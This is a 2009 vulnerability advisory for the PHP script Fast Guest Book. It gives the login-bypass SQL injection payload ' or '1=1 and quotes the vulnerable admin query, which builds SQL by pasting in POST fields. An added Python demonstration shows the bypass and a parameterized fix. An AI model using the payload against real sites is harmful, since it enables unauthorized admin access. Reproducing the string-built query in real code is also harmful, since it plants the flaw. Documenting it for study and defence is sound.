
# Title : Fast Guest Book (Auth Bypass) SQL Injection Vulnerability
# Published : 2009-01-11
# Author : Moudi


###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     /     | |     | |        /     | | | |
                    / _    | |     | |       / _    | |_| |
                   / ___   | |___  | |___   / ___   |  _  |
   IN THE NAME OF /_/   _ |_____| |_____| /_/   _ |_| |_|
                                                             

==============================================================================

==============================================================================
    Fast Guest Book (Auth Bypass) SQL Injection Vulnerability
==============================================================================

	[??] Script:             [ Fast Guest Book ]
	[??] Language:           [ PHP ]
	[??] Website:            [ http://fastcreators.com/products/guestbook/download.php ]
	[??] Founder:            [ Moudi <m0udi@9.cn> ]
	[??] Thanks to:          [ MiZoZ , ZuKa , str0ke , and all hackers... ]
	[??] Team:               [ EvilWay ]

###########################################################################

===[ Exploit ]===

	[??] ' or '1=1

===[ BUG ]===

	[??] Bug In adminauthorize.php

	<?php
	// The POST fields are interpolated straight into the SQL string, with no
	// escaping or parameter binding, so a quote in either field rewrites the
	// WHERE clause instead of being compared as data.
	$query = "select * from admin where userid='{$_POST['uname']}' AND
	pass='{$_POST['pass']}'";
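Added illustration, not part of the original advisory and not the product's own code: a Python stand-in for the query above, run against an in-memory SQLite table. The table and column names (admin, userid, pass) come from the advisory's query; the admin credentials and the use of SQLite instead of the guestbook's MySQL backend are constructed for the demonstration. It shows why the string-built query accepts the quoted input from the Exploit section while the same check written with bound parameters does not.

```python
import sqlite3

# Constructed stand-in for the guestbook's admin table (not the product's real
# schema or data): a single admin row with a known userid/pass pair.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (userid TEXT, pass TEXT)")
    conn.execute("INSERT INTO admin VALUES ('admin', 'secret')")
    conn.commit()
    return conn

def build_vulnerable_query(uname, pw):
    # Same construction as adminauthorize.php: the request values are pasted
    # into the SQL text, so a quote in the input closes the literal early and
    # whatever follows becomes part of the WHERE clause.
    return "select * from admin where userid='%s' AND pass='%s'" % (uname, pw)

def vulnerable_login(conn, uname, pw):
    # Returns True when the built query matches at least one admin row.
    return conn.execute(build_vulnerable_query(uname, pw)).fetchone() is not None

def safe_login(conn, uname, pw):
    # Hardened form: placeholders bind the input as data. The database never
    # parses the user-supplied text as SQL, so the quote trick has no effect.
    query = "select * from admin where userid=? AND pass=?"
    return conn.execute(query, (uname, pw)).fetchone() is not None

if __name__ == "__main__":
    conn = make_db()
    payload = "' or '1=1"          # the input listed in the Exploit section
    print(build_vulnerable_query(payload, payload))
    print("vulnerable:", vulnerable_login(conn, payload, payload))   # True
    print("parameterized:", safe_login(conn, payload, payload))     # False
```

With the payload in both fields the built statement reads `... userid='' or '1=1' AND pass='' or '1=1'`; the trailing `or '1=1'` is always true, so the query returns the admin row regardless of the credentials. The parameterized version compares the literal text `' or '1=1` against the stored values and finds nothing. Detecting attempts at this pattern is simple on the web tier: single quotes or `or`/`=` sequences in login fields are a strong signal worth logging.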



Author: Moudi

###########################################################################

# www.Syue.com [2009-01-11]